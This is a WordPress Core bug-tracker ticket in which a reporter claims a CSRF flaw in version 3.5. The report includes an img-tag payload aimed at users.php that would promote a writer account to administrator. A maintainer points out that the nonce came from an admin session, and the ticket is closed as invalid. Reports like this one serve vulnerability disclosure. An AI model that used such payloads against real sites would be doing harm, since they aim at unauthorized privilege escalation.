WordPress.org

Make WordPress Core

Opened 6 years ago

Closed 6 years ago

#23004 closed defect (bug) (invalid)

Editor CSRF vulnerabilities discovered

Reported by: drssay Owned by:
Milestone: Priority: normal
Severity: normal Version: 3.5
Component: Security Keywords:
Focuses: Cc:

Description

Reproduce

  1. Login as a user with writer(or editor) privileges. -> example) user name "test", user id = 2
  2. Input syntax visual editor below.
<img src="http://localhost/wp-admin/users.php?s=&_wponce=7258002722&_wp_http_referer=%2Fwp-admin%2Fusers.php%3Fupdate%3Dpromote&action=-1&new_role=administrator&changeit=%EB%B3%80%EA%B2%BD&paged=1&users%5B%5D=2&action2=-1" alt="" />

Parameters passed to the user number users%5B%5D=2

  1. Login as a user with administrator privileges. -> example) username "admin", user id 1
  2. user "admin" view post written in step 2.
  3. user "admin" can check the xbox image
  4. user "test" to gain administrator privileges

Attachments will be added

Change History (3)

#1 @TobiasBg
6 years ago

Where did you get the value "7258002722" for the _wpnonce parameter from?

Copy/paste from a session when you where logged in as admin? That doesn't count then.

And: Next time please do not report security vulnerabilities here, but by following the instructions at http://codex.wordpress.org/FAQ_Security

#2 @drssay
6 years ago

Sorry, I see.
I send detail vulnerablities to email address security_AT_wordpress.org

#3 @SergeyBiryukov
6 years ago

  • Component changed from General to Security
  • Milestone Awaiting Review deleted
  • Resolution set to invalid
  • Severity changed from critical to normal
  • Status changed from new to closed
Note: See TracTickets for help on using tickets.